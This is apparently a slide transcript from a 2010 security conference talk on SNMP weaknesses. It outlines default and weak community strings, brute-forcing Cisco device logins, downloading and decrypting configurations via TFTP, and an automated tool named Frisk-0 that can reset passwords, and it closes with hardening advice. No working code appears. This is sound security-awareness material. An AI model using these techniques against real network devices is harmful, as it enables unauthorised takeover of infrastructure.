2010 za con_georg-christian_pranschke
TRANSCRIPT
Agenda
How it all began…
SNMP ? SNMP from a Security Perspective SNMP on Cisco Appliances Exploiting SNMP Misconfigurations Frisk-0 Secure your SNMP enabled devices
Questions
SNMP ?
Simple Network Management Protocol Monitor and manage devices on the network
Routers Switches Bridges Hubs IP phones and cameras Printers Computers
SNMP ?
UDP: 161 / 162
Manager Agent
Concepts MIB – Message Information Block OID – Object Identifier PDU – Protocol Data Unit
Versions 1 and 2c vs 3
SNMP from a Security Perspective
Plain-text protocol
UDP Spoofing
Get/Set-responses contain community string
Community Strings Defaults: public, private, admin, snmp, snmpd … Weak Communities: 3 characters !!! Reuse Community schemes
User awareness
SNMP from a Security Perspective
Information Disclosure Internal IP Addresses Routing Information Running Processes Running Services Installed Software Usernames Hardware
Compromise
Brute Forcing Cisco Appliances
TELNET Often only password required Only three tries – then reconnect Enable password needs to be brute forced as well
SSH Needs username and password (ssh -1) Only three tries per connection Enable password needs to be brute forced as well
HTTP(S) Basic Authentication Fastest so far No enable password
Brute Forcing Cisco Appliances
SNMP Almost as fast as we can send UDP packets ! Just community string needed ! Privileged access to the device !
SNMP on Cisco Appliances
Remote Configuration through SNMP Setting OIDs Configuration up- and downloads via TFTP Running config vs Startup config
Frisk-0
”Rogue Management Interface” Brute forces community strings Downloads Running and Startup configurations Extracts and decrypts all passwords and hashes Batch mode
From targets file Network ranges
Spoofing capabilities “Configlets” (enable TELNET / reset passwords)
Fully automated and unattended
Secure Your SNMP Enabled Devices
Do you really need SNMP ? Do you really need a RW community ?
Set strong community strings 40+ characters ? Why not!
Access-lists SNMP TFTP ! (spoofing) UDP